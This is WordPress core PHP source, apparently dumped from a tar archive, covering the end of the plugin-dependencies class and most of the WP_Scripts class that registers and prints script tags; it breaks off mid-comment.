$status['message'] = __( 'All required plugins are installed and activated.' );
wp_send_json_success( $status );
}
/**
* Gets data for installed plugins.
*
* @since 6.5.0
*
* @return array An array of plugin data.
*/
protected static function get_plugins() {
if ( is_array( self::$plugins ) ) {
return self::$plugins;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
self::$plugins = get_plugins();
return self::$plugins;
}
/**
* Reads and stores dependency slugs from a plugin's 'Requires Plugins' header.
*
* @since 6.5.0
*/
protected static function read_dependencies_from_plugin_headers() {
self::$dependencies = array();
self::$dependency_slugs = array();
self::$dependent_slugs = array();
$plugins = self::get_plugins();
foreach ( $plugins as $plugin => $header ) {
if ( '' === $header['RequiresPlugins'] ) {
continue;
}
$dependency_slugs = self::sanitize_dependency_slugs( $header['RequiresPlugins'] );
self::$dependencies[ $plugin ] = $dependency_slugs;
self::$dependency_slugs = array_merge( self::$dependency_slugs, $dependency_slugs );
$dependent_slug = self::convert_to_slug( $plugin );
self::$dependent_slugs[ $plugin ] = $dependent_slug;
}
self::$dependency_slugs = array_unique( self::$dependency_slugs );
}
/**
* Sanitizes slugs.
*
* @since 6.5.0
*
* @param string $slugs A comma-separated string of plugin dependency slugs.
* @return array An array of sanitized plugin dependency slugs.
*/
protected static function sanitize_dependency_slugs( $slugs ) {
$sanitized_slugs = array();
$slugs = explode( ',', $slugs );
foreach ( $slugs as $slug ) {
$slug = trim( $slug );
/**
* Filters a plugin dependency's slug before matching to
* the WordPress.org slug format.
*
* Can be used to switch between free and premium plugin slugs, for example.
*
* @since 6.5.0
*
* @param string $slug The slug.
*/
$slug = apply_filters( 'wp_plugin_dependencies_slug', $slug );
// Match to WordPress.org slug format.
if ( preg_match( '/^[a-z0-9]+(-[a-z0-9]+)*$/mu', $slug ) ) {
$sanitized_slugs[] = $slug;
}
}
$sanitized_slugs = array_unique( $sanitized_slugs );
sort( $sanitized_slugs );
return $sanitized_slugs;
}
/**
* Gets the filepath of installed dependencies.
* If a dependency is not installed, the filepath defaults to false.
*
* @since 6.5.0
*
* @return array An array of install dependencies filepaths, relative to the plugins directory.
*/
protected static function get_dependency_filepaths() {
if ( is_array( self::$dependency_filepaths ) ) {
return self::$dependency_filepaths;
}
if ( null === self::$dependency_slugs ) {
return array();
}
self::$dependency_filepaths = array();
$plugin_dirnames = self::get_plugin_dirnames();
foreach ( self::$dependency_slugs as $slug ) {
if ( isset( $plugin_dirnames[ $slug ] ) ) {
self::$dependency_filepaths[ $slug ] = $plugin_dirnames[ $slug ];
continue;
}
self::$dependency_filepaths[ $slug ] = false;
}
return self::$dependency_filepaths;
}
/**
* Retrieves and stores dependency plugin data from the WordPress.org Plugin API.
*
* @since 6.5.0
*
* @global string $pagenow The filename of the current screen.
*
* @return array|void An array of dependency API data, or void on early exit.
*/
protected static function get_dependency_api_data() {
global $pagenow;
if ( ! is_admin() || ( 'plugins.php' !== $pagenow && 'plugin-install.php' !== $pagenow ) ) {
return;
}
if ( is_array( self::$dependency_api_data ) ) {
return self::$dependency_api_data;
}
$plugins = self::get_plugins();
self::$dependency_api_data = (array) get_site_transient( 'wp_plugin_dependencies_plugin_data' );
foreach ( self::$dependency_slugs as $slug ) {
// Set transient for individual data, remove from self::$dependency_api_data if transient expired.
if ( ! get_site_transient( "wp_plugin_dependencies_plugin_timeout_{$slug}" ) ) {
unset( self::$dependency_api_data[ $slug ] );
set_site_transient( "wp_plugin_dependencies_plugin_timeout_{$slug}", true, 12 * HOUR_IN_SECONDS );
}
if ( isset( self::$dependency_api_data[ $slug ] ) ) {
if ( false === self::$dependency_api_data[ $slug ] ) {
$dependency_file = self::get_dependency_filepath( $slug );
if ( false === $dependency_file ) {
self::$dependency_api_data[ $slug ] = array( 'Name' => $slug );
} else {
self::$dependency_api_data[ $slug ] = array( 'Name' => $plugins[ $dependency_file ]['Name'] );
}
continue;
}
// Don't hit the Plugin API if data exists.
if ( ! empty( self::$dependency_api_data[ $slug ]['last_updated'] ) ) {
continue;
}
}
if ( ! function_exists( 'plugins_api' ) ) {
require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
}
$information = plugins_api(
'plugin_information',
array(
'slug' => $slug,
'fields' => array(
'short_description' => true,
'icons' => true,
),
)
);
if ( is_wp_error( $information ) ) {
continue;
}
self::$dependency_api_data[ $slug ] = (array) $information;
// plugins_api() returns 'name' not 'Name'.
self::$dependency_api_data[ $slug ]['Name'] = self::$dependency_api_data[ $slug ]['name'];
set_site_transient( 'wp_plugin_dependencies_plugin_data', self::$dependency_api_data, 0 );
}
// Remove from self::$dependency_api_data if slug no longer a dependency.
$differences = array_diff( array_keys( self::$dependency_api_data ), self::$dependency_slugs );
foreach ( $differences as $difference ) {
unset( self::$dependency_api_data[ $difference ] );
}
ksort( self::$dependency_api_data );
// Remove empty elements.
self::$dependency_api_data = array_filter( self::$dependency_api_data );
set_site_transient( 'wp_plugin_dependencies_plugin_data', self::$dependency_api_data, 0 );
return self::$dependency_api_data;
}
/**
* Gets plugin directory names.
*
* @since 6.5.0
*
* @return array An array of plugin directory names.
*/
protected static function get_plugin_dirnames() {
if ( is_array( self::$plugin_dirnames ) ) {
return self::$plugin_dirnames;
}
self::$plugin_dirnames = array();
$plugin_files = array_keys( self::get_plugins() );
foreach ( $plugin_files as $plugin_file ) {
$slug = self::convert_to_slug( $plugin_file );
self::$plugin_dirnames[ $slug ] = $plugin_file;
}
return self::$plugin_dirnames;
}
/**
* Gets circular dependency data.
*
* @since 6.5.0
*
* @return array[] An array of circular dependency pairings.
*/
protected static function get_circular_dependencies() {
if ( is_array( self::$circular_dependencies_pairs ) ) {
return self::$circular_dependencies_pairs;
}
if ( null === self::$dependencies ) {
return array();
}
self::$circular_dependencies_slugs = array();
self::$circular_dependencies_pairs = array();
foreach ( self::$dependencies as $dependent => $dependencies ) {
/*
* $dependent is in 'a/a.php' format. Dependencies are stored as slugs, i.e. 'a'.
*
* Convert $dependent to slug format for checking.
*/
$dependent_slug = self::convert_to_slug( $dependent );
self::$circular_dependencies_pairs = array_merge(
self::$circular_dependencies_pairs,
self::check_for_circular_dependencies( array( $dependent_slug ), $dependencies )
);
}
return self::$circular_dependencies_pairs;
}
/**
* Checks for circular dependencies.
*
* @since 6.5.0
*
* @param array $dependents Array of dependent plugins.
* @param array $dependencies Array of plugins dependencies.
* @return array A circular dependency pairing, or an empty array if none exists.
*/
protected static function check_for_circular_dependencies( $dependents, $dependencies ) {
$circular_dependencies_pairs = array();
// Check for a self-dependency.
$dependents_location_in_its_own_dependencies = array_intersect( $dependents, $dependencies );
if ( ! empty( $dependents_location_in_its_own_dependencies ) ) {
foreach ( $dependents_location_in_its_own_dependencies as $self_dependency ) {
self::$circular_dependencies_slugs[] = $self_dependency;
$circular_dependencies_pairs[] = array( $self_dependency, $self_dependency );
// No need to check for itself again.
unset( $dependencies[ array_search( $self_dependency, $dependencies, true ) ] );
}
}
/*
* Check each dependency to see:
* 1. If it has dependencies.
* 2. If its list of dependencies includes one of its own dependents.
*/
foreach ( $dependencies as $dependency ) {
// Check if the dependency is also a dependent.
$dependency_location_in_dependents = array_search( $dependency, self::$dependent_slugs, true );
if ( false !== $dependency_location_in_dependents ) {
$dependencies_of_the_dependency = self::$dependencies[ $dependency_location_in_dependents ];
foreach ( $dependents as $dependent ) {
// Check if its dependencies includes one of its own dependents.
$dependent_location_in_dependency_dependencies = array_search(
$dependent,
$dependencies_of_the_dependency,
true
);
if ( false !== $dependent_location_in_dependency_dependencies ) {
self::$circular_dependencies_slugs[] = $dependent;
self::$circular_dependencies_slugs[] = $dependency;
$circular_dependencies_pairs[] = array( $dependent, $dependency );
// Remove the dependent from its dependency's dependencies.
unset( $dependencies_of_the_dependency[ $dependent_location_in_dependency_dependencies ] );
}
}
$dependents[] = $dependency;
/*
* Now check the dependencies of the dependency's dependencies for the dependent.
*
* Yes, that does make sense.
*/
$circular_dependencies_pairs = array_merge(
$circular_dependencies_pairs,
self::check_for_circular_dependencies( $dependents, array_unique( $dependencies_of_the_dependency ) )
);
}
}
return $circular_dependencies_pairs;
}
/**
* Converts a plugin filepath to a slug.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return string The plugin's slug.
*/
protected static function convert_to_slug( $plugin_file ) {
if ( 'hello.php' === $plugin_file ) {
return 'hello-dolly';
}
return str_contains( $plugin_file, '/' ) ? dirname( $plugin_file ) : str_replace( '.php', '', $plugin_file );
}
}
class-wp-scripts.php 0000666 00000104060 15224151220 0010472 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Core class used to register scripts.
*
* @since 2.1.0
*
* @see WP_Dependencies
*/
class WP_Scripts extends WP_Dependencies {
/**
* Base URL for scripts.
*
* Full URL with trailing slash.
*
* @since 2.6.0
* @var string
*/
public $base_url;
/**
* URL of the content directory.
*
* @since 2.8.0
* @var string
*/
public $content_url;
/**
* Default version string for scripts.
*
* @since 2.6.0
* @var string
*/
public $default_version;
/**
* Holds handles of scripts which are enqueued in footer.
*
* @since 2.8.0
* @var array
*/
public $in_footer = array();
/**
* Holds a list of script handles which will be concatenated.
*
* @since 2.8.0
* @var string
*/
public $concat = '';
/**
* Holds a string which contains script handles and their version.
*
* @since 2.8.0
* @deprecated 3.4.0
* @var string
*/
public $concat_version = '';
/**
* Whether to perform concatenation.
*
* @since 2.8.0
* @var bool
*/
public $do_concat = false;
/**
* Holds HTML markup of scripts and additional data if concatenation
* is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_html = '';
/**
* Holds inline code if concatenation is enabled.
*
* @since 2.8.0
* @var string
*/
public $print_code = '';
/**
* Holds a list of script handles which are not in the default directory
* if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_handles = '';
/**
* Holds a string which contains handles and versions of scripts which
* are not in the default directory if concatenation is enabled.
*
* Unused in core.
*
* @since 2.8.0
* @var string
*/
public $ext_version = '';
/**
* List of default directories.
*
* @since 2.8.0
* @var array
*/
public $default_dirs;
/**
* Holds a mapping of dependents (as handles) for a given script handle.
* Used to optimize recursive dependency tree checks.
*
* @since 6.3.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds a reference to the delayed (non-blocking) script loading strategies.
* Used by methods that validate loading strategies.
*
* @since 6.3.0
* @var string[]
*/
private $delayed_strategies = array( 'defer', 'async' );
/**
* Constructor.
*
* @since 2.6.0
*/
public function __construct() {
$this->init();
add_action( 'init', array( $this, 'init' ), 0 );
}
/**
* Initialize the class.
*
* @since 3.4.0
*/
public function init() {
/**
* Fires when the WP_Scripts instance is initialized.
*
* @since 2.6.0
*
* @param WP_Scripts $wp_scripts WP_Scripts instance (passed by reference).
*/
do_action_ref_array( 'wp_default_scripts', array( &$this ) );
}
/**
* Prints scripts.
*
* Prints the scripts passed to it or the print queue. Also prints all necessary dependencies.
*
* @since 2.1.0
* @since 2.8.0 Added the `$group` parameter.
*
* @param string|string[]|false $handles Optional. Scripts to be printed: queue (false),
* single script (string), or multiple scripts (array of strings).
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return string[] Handles of scripts that have been printed.
*/
public function print_scripts( $handles = false, $group = false ) {
return $this->do_items( $handles, $group );
}
/**
* Prints extra scripts of a registered script.
*
* @since 2.1.0
* @since 2.8.0 Added the `$display` parameter.
* @deprecated 3.3.0
*
* @see print_extra_script()
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_scripts_l10n( $handle, $display = true ) {
_deprecated_function( __FUNCTION__, '3.3.0', 'WP_Scripts::print_extra_script()' );
return $this->print_extra_script( $handle, $display );
}
/**
* Prints extra scripts of a registered script.
*
* @since 3.3.0
*
* @param string $handle The script's registered handle.
* @param bool $display Optional. Whether to print the extra script
* instead of just returning it. Default true.
* @return bool|string|void Void if no data exists, extra scripts if `$display` is true,
* true otherwise.
*/
public function print_extra_script( $handle, $display = true ) {
$output = $this->get_data( $handle, 'data' );
if ( ! $output ) {
return;
}
/*
* Do not print a sourceURL comment if concatenation is enabled.
*
* Extra scripts may be concatenated into a single script.
* The line-based sourceURL comments may break concatenated scripts
* and do not make sense when multiple scripts are joined together.
*/
if ( ! $this->do_concat ) {
$output .= sprintf(
"\n//# sourceURL=%s",
rawurlencode( "{$handle}-js-extra" )
);
}
if ( ! $display ) {
return $output;
}
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-extra" ) );
return true;
}
/**
* Checks whether all dependents of a given handle are in the footer.
*
* If there are no dependents, this is considered the same as if all dependents were in the footer.
*
* @since 6.4.0
*
* @param string $handle Script handle.
* @return bool Whether all dependents are in the footer.
*/
private function are_all_dependents_in_footer( $handle ) {
foreach ( $this->get_dependents( $handle ) as $dep ) {
if ( isset( $this->groups[ $dep ] ) && 0 === $this->groups[ $dep ] ) {
return false;
}
}
return true;
}
/**
* Processes a script dependency.
*
* @since 2.6.0
* @since 2.8.0 Added the `$group` parameter.
*
* @see WP_Dependencies::do_item()
*
* @param string $handle The script's registered handle.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function do_item( $handle, $group = false ) {
if ( ! parent::do_item( $handle ) ) {
return false;
}
if ( 0 === $group && $this->groups[ $handle ] > 0 ) {
$this->in_footer[] = $handle;
return false;
}
if ( false === $group && in_array( $handle, $this->in_footer, true ) ) {
$this->in_footer = array_diff( $this->in_footer, (array) $handle );
}
$obj = $this->registered[ $handle ];
if ( $obj->extra['conditional'] ?? false ) {
return false;
}
if ( null === $obj->ver ) {
$ver = '';
} else {
$ver = $obj->ver ? $obj->ver : $this->default_version;
}
if ( isset( $this->args[ $handle ] ) ) {
$ver = $ver ? $ver . '&' . $this->args[ $handle ] : $this->args[ $handle ];
}
$src = $obj->src;
$strategy = $this->get_eligible_loading_strategy( $handle );
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
if ( ! $this->is_delayed_strategy( $intended_strategy ) ) {
$intended_strategy = '';
}
/*
* Move this script to the footer if:
* 1. The script is in the header group.
* 2. The current output is the header.
* 3. The intended strategy is delayed.
* 4. The actual strategy is not delayed.
* 5. All dependent scripts are in the footer.
*/
if (
0 === $group &&
0 === $this->groups[ $handle ] &&
$intended_strategy &&
! $this->is_delayed_strategy( $strategy ) &&
$this->are_all_dependents_in_footer( $handle )
) {
$this->in_footer[] = $handle;
return false;
}
$before_script = $this->get_inline_script_tag( $handle, 'before' );
$after_script = $this->get_inline_script_tag( $handle, 'after' );
if ( $before_script || $after_script ) {
$inline_script_tag = $before_script . $after_script;
} else {
$inline_script_tag = '';
}
/*
* Prevent concatenation of scripts if the text domain is defined
* to ensure the dependency order is respected.
*/
$translations_stop_concat = ! empty( $obj->textdomain );
$translations = $this->print_translations( $handle, false );
if ( $translations ) {
/*
* The sourceURL comment is not included by WP_Scripts::print_translations()
* when `$display` is `false` to prevent issues where the script tag contents are used
* by extenders for other purposes, for example concatenated with other script content.
*
* Include the sourceURL comment here as it would be when printed directly.
*/
$source_url = rawurlencode( "{$handle}-js-translations" );
$translations .= "\n//# sourceURL={$source_url}";
$translations = wp_get_inline_script_tag( $translations, array( 'id' => "{$handle}-js-translations" ) );
}
if ( $this->do_concat ) {
/**
* Filters the script loader source.
*
* @since 2.2.0
*
* @param string $src Script loader source path.
* @param string $handle Script handle.
*/
$filtered_src = apply_filters( 'script_loader_src', $src, $handle );
if (
$this->in_default_dir( $filtered_src )
&& ( $before_script || $after_script || $translations_stop_concat || $this->is_delayed_strategy( $strategy ) )
) {
$this->do_concat = false;
// Have to print the so-far concatenated scripts right away to maintain the right order.
_print_scripts();
$this->reset();
} elseif ( $this->in_default_dir( $filtered_src ) ) {
$this->print_code .= $this->print_extra_script( $handle, false );
$this->concat .= "$handle,";
$this->concat_version .= "$handle$ver";
return true;
} else {
$this->ext_handles .= "$handle,";
$this->ext_version .= "$handle$ver";
}
}
$this->print_extra_script( $handle );
// A single item may alias a set of items, by having dependencies, but no source.
if ( ! $src ) {
if ( $inline_script_tag ) {
if ( $this->do_concat ) {
$this->print_html .= $inline_script_tag;
} else {
echo $inline_script_tag;
}
}
return true;
}
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $this->content_url && str_starts_with( $src, $this->content_url ) ) ) {
$src = $this->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url_raw( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
return true;
}
$attr = array(
'src' => $src,
'id' => "{$handle}-js",
);
if ( $strategy ) {
$attr[ $strategy ] = true;
}
if ( $intended_strategy ) {
$attr['data-wp-strategy'] = $intended_strategy;
}
// Determine fetchpriority.
$original_fetchpriority = isset( $obj->extra['fetchpriority'] ) ? $obj->extra['fetchpriority'] : null;
if ( null === $original_fetchpriority || ! $this->is_valid_fetchpriority( $original_fetchpriority ) ) {
$original_fetchpriority = 'auto';
}
$actual_fetchpriority = $this->get_highest_fetchpriority_with_dependents( $handle );
if ( null === $actual_fetchpriority ) {
// If null, it's likely this script was not explicitly enqueued, so in this case use the original priority.
$actual_fetchpriority = $original_fetchpriority;
}
if ( is_string( $actual_fetchpriority ) && 'auto' !== $actual_fetchpriority ) {
$attr['fetchpriority'] = $actual_fetchpriority;
}
if ( $original_fetchpriority !== $actual_fetchpriority ) {
$attr['data-wp-fetchpriority'] = $original_fetchpriority;
}
$tag = $translations . $before_script;
$tag .= wp_get_script_tag( $attr );
$tag .= $after_script;
/**
* Filters the HTML script tag of an enqueued script.
*
* @since 4.1.0
*
* @param string $tag The `<script>` tag for the enqueued script.
* @param string $handle The script's registered handle.
* @param string $src The script's source URL.
*/
$tag = apply_filters( 'script_loader_tag', $tag, $handle, $src );
if ( $this->do_concat ) {
$this->print_html .= $tag;
} else {
echo $tag;
}
return true;
}
/**
* Adds extra code to a registered script.
*
* @since 4.5.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return bool True on success, false on failure.
*/
public function add_inline_script( $handle, $data, $position = 'after' ) {
if ( ! $data ) {
return false;
}
if ( 'after' !== $position ) {
$position = 'before';
}
$script = (array) $this->get_data( $handle, $position );
$script[] = $data;
return $this->add_data( $handle, $position, $script );
}
/**
* Prints inline scripts registered for a specific handle.
*
* @since 4.5.0
* @deprecated 6.3.0 Use methods get_inline_script_tag() or get_inline_script_data() instead.
*
* @param string $handle Name of the script to print inline scripts for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @param bool $display Optional. Whether to print the script tag
* instead of just returning the script data. Default true.
* @return string|false Script data on success, false otherwise.
*/
public function print_inline_script( $handle, $position = 'after', $display = true ) {
_deprecated_function( __METHOD__, '6.3.0', 'WP_Scripts::get_inline_script_data() or WP_Scripts::get_inline_script_tag()' );
$output = $this->get_inline_script_data( $handle, $position );
if ( empty( $output ) ) {
return false;
}
if ( $display ) {
echo $this->get_inline_script_tag( $handle, $position );
}
return $output;
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for.
* Must be lowercase.
* @param string $position Optional. Whether to add the inline script
* before the handle or after. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_data( $handle, $position = 'after' ) {
$data = $this->get_data( $handle, $position );
if ( empty( $data ) || ! is_array( $data ) ) {
return '';
}
/*
* Print sourceURL comment regardless of concatenation.
*
* Inline scripts prevent scripts from being concatenated, so
* sourceURL comments are safe to print for inline scripts.
*/
$data[] = sprintf(
'//# sourceURL=%s',
rawurlencode( "{$handle}-js-{$position}" )
);
return trim( implode( "\n", $data ), "\n" );
}
/**
* Gets tags for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get associated inline script tag for.
* Must be lowercase.
* @param string $position Optional. Whether to get tag for inline
* scripts in the before or after position. Default 'after'.
* @return string Inline script, which may be empty string.
*/
public function get_inline_script_tag( $handle, $position = 'after' ) {
$js = $this->get_inline_script_data( $handle, $position );
if ( empty( $js ) ) {
return '';
}
$id = "{$handle}-js-{$position}";
return wp_get_inline_script_tag( $js, compact( 'id' ) );
}
/**
* Localizes a script, only if the script has already been added.
*
* @since 2.1.0
*
* @param string $handle Name of the script to attach data to.
* @param string $object_name Name of the variable that will contain the data.
* @param array $l10n Array of data to localize.
* @return bool True on success, false on failure.
*/
public function localize( $handle, $object_name, $l10n ) {
if ( 'jquery' === $handle ) {
$handle = 'jquery-core';
}
if ( is_array( $l10n ) && isset( $l10n['l10n_print_after'] ) ) { // back compat, preserve the code in 'l10n_print_after' if present.
$after = $l10n['l10n_print_after'];
unset( $l10n['l10n_print_after'] );
}
if ( ! is_array( $l10n ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $l10n, 2: wp_add_inline_script() */
__( 'The %1$s parameter must be an array. To pass arbitrary data to scripts, use the %2$s function instead.' ),
'<code>$l10n</code>',
'<code>wp_add_inline_script()</code>'
),
'5.7.0'
);
if ( false === $l10n ) {
// This should really not be needed, but is necessary for backward compatibility.
$l10n = array( $l10n );
}
}
if ( is_string( $l10n ) ) {
$l10n = html_entity_decode( $l10n, ENT_QUOTES, 'UTF-8' );
} elseif ( is_array( $l10n ) ) {
foreach ( $l10n as $key => $value ) {
if ( ! is_scalar( $value ) ) {
continue;
}
$l10n[ $key ] = html_entity_decode( (string) $value, ENT_QUOTES, 'UTF-8' );
}
}
$script = "var $object_name = " . wp_json_encode( $l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ';';
if ( ! empty( $after ) ) {
$script .= "\n$after;";
}
$data = $this->get_data( $handle, 'data' );
if ( ! empty( $data ) ) {
$script = "$data\n$script";
}
return $this->add_data( $handle, 'data', $script );
}
/**
* Sets handle group.
*
* @since 2.8.0
*
* @see WP_Dependencies::set_group()
*
* @param string $handle Name of the item. Should be unique.
* @param bool $recursion Internal flag that calling function was called recursively.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool Not already in the group or a lower group.
*/
public function set_group( $handle, $recursion, $group = false ) {
if ( isset( $this->registered[ $handle ]->args ) && 1 === $this->registered[ $handle ]->args ) {
$calculated_group = 1;
} else {
$calculated_group = (int) $this->get_data( $handle, 'group' );
}
if ( false !== $group && $calculated_group > $group ) {
$calculated_group = $group;
}
return parent::set_group( $handle, $recursion, $calculated_group );
}
/**
* Sets a translation textdomain.
*
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @param string $handle Name of the script to register a translation domain to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was registered, false if not.
*/
public function set_translations( $handle, $domain = 'default', $path = '' ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
/** @var \_WP_Dependency $obj */
$obj = $this->registered[ $handle ];
if ( ! in_array( 'wp-i18n', $obj->deps, true ) ) {
$obj->deps[] = 'wp-i18n';
}
return $obj->set_translations( $domain, $path );
}
/**
* Prints translations set for a specific handle.
*
* @since 5.0.0
*
* @param string $handle Name of the script to add the inline script to.
* Must be lowercase.
* @param bool $display Optional. Whether to print the script
* instead of just returning it. Default true.
* @return string|false Script on success, false otherwise.
*/
public function print_translations( $handle, $display = true ) {
if ( ! isset( $this->registered[ $handle ] ) || empty( $this->registered[ $handle ]->textdomain ) ) {
return false;
}
$domain = $this->registered[ $handle ]->textdomain;
$path = '';
if ( isset( $this->registered[ $handle ]->translations_path ) ) {
$path = $this->registered[ $handle ]->translations_path;
}
$json_translations = load_script_textdomain( $handle, $domain, $path );
if ( ! $json_translations ) {
return false;
}
$output = <<<JS
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "{$domain}", {$json_translations} );
JS;
if ( $display ) {
$source_url = rawurlencode( "{$handle}-js-translations" );
$output .= "\n//# sourceURL={$source_url}";
wp_print_inline_script_tag( $output, array( 'id' => "{$handle}-js-translations" ) );
}
return $output;
}
/**
* Determines script dependencies.
*
* @since 2.1.0
*
* @see WP_Dependencies::all_deps()
*
* @param string|string[] $handles Item handle (string) or item handles (array of strings).
* @param bool $recursion Optional. Internal flag that function is calling itself.
* Default false.
* @param int|false $group Optional. Group level: level (int), no groups (false).
* Default false.
* @return bool True on success, false on failure.
*/
public function all_deps( $handles, $recursion = false, $group = false ) {
$result = parent::all_deps( $handles, $recursion, $group );
if ( ! $recursion ) {
/**
* Filters the list of script dependencies left to print.
*
* @since 2.3.0
*
* @param string[] $to_do An array of script dependency handles.
*/
$this->to_do = apply_filters( 'print_scripts_array', $this->to_do );
}
return $result;
}
/**
* Processes items and dependencies for the head group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_head_items() {
$this->do_items( false, 0 );
return $this->done;
}
/**
* Processes items and dependencies for the footer group.
*
* @since 2.8.0
*
* @see WP_Dependencies::do_items()
*
* @return string[] Handles of items that have been processed.
*/
public function do_footer_items() {
$this->do_items( false, 1 );
return $this->done;
}
/**
* Whether a handle's source is in a default directory.
*
* @since 2.8.0
*
* @param string $src The source of the enqueued script.
* @return bool True if found, false if not.
*/
public function in_default_dir( $src ) {
if ( ! $this->default_dirs ) {
return true;
}
if ( str_starts_with( $src, '/' . WPINC . '/js/l10n' ) ) {
return false;
}
foreach ( (array) $this->default_dirs as $test ) {
if ( str_starts_with( $src, $test ) ) {
return true;
}
}
return false;
}
/**
* This overrides the add_data method from WP_Dependencies, to support normalizing of $args.
*
* @since 6.3.0
*
* @param string $handle Name of the item. Should be unique.
* @param string $key The data key.
* @param mixed $value The data value.
* @return bool True on success, false on failure.
*/
public function add_data( $handle, $key, $value ) {
if ( ! isset( $this->registered[ $handle ] ) ) {
return false;
}
if ( 'conditional' === $key ) {
// If a dependency is declared by a conditional script, remove it.
$this->registered[ $handle ]->deps = array();
}
if ( 'strategy' === $key ) {
if ( ! empty( $value ) && ! $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Invalid strategy `%1$s` defined for `%2$s` during script registration.' ),
$value,
$handle
),
'6.3.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src && $this->is_delayed_strategy( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $strategy, 2: $handle */
__( 'Cannot supply a strategy `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
$value,
$handle
),
'6.3.0'
);
return false;
}
} elseif ( 'fetchpriority' === $key ) {
if ( empty( $value ) ) {
$value = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $value ) ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
} elseif ( ! $this->registered[ $handle ]->src ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $handle */
__( 'Cannot supply a fetchpriority `%1$s` for script `%2$s` because it is an alias (it lacks a `src` value).' ),
is_string( $value ) ? $value : gettype( $value ),
$handle
),
'6.9.0'
);
return false;
}
}
return parent::add_data( $handle, $key, $value );
}
/**
* Gets all dependents of a script.
*
* This is not recursive.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string[] Script handles.
*/
private function get_dependents( $handle ) {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $handle ] ) ) {
return $this->dependents_map[ $handle ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_handle => $args ) {
if ( in_array( $handle, $args->deps, true ) ) {
$dependents[] = $registered_handle;
}
}
// Add the handles dependents to the map to ease future lookups.
$this->dependents_map[ $handle ] = $dependents;
return $dependents;
}
/**
* Checks if the strategy passed is a valid delayed (non-blocking) strategy.
*
* @since 6.3.0
*
* @param string|mixed $strategy The strategy to check.
* @return bool True if $strategy is one of the delayed strategies, otherwise false.
*/
private function is_delayed_strategy( $strategy ): bool {
return in_array(
$strategy,
$this->delayed_strategies,
true
);
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, array( 'auto', 'low', 'high' ), true );
}
/**
* Gets the best eligible loading strategy for a script.
*
* @since 6.3.0
*
* @param string $handle The script handle.
* @return string The best eligible loading strategy.
*/
private function get_eligible_loading_strategy( $handle ) {
$intended_strategy = (string) $this->get_data( $handle, 'strategy' );
// Bail early if there is no intended strategy.
if ( ! $intended_strategy ) {
return '';
}
/*
* If the intended strategy is 'defer', limit the initial list of eligible
* strategies, since 'async' can fallback to 'defer', but not vice-versa.
*/
$initial_strategy = ( 'defer' === $intended_strategy ) ? array( 'defer' ) : null;
$eligible_strategies = $this->filter_eligible_strategies( $handle, $initial_strategy );
// Return early once we know the eligible strategy is blocking.
if ( empty( $eligible_strategies ) ) {
return '';
}
return in_array( 'async', $eligible_strategies, true ) ? 'async' : 'defer';
}
/**
* Filter the list of eligible loading strategies for a script.
*
* @since 6.3.0
*
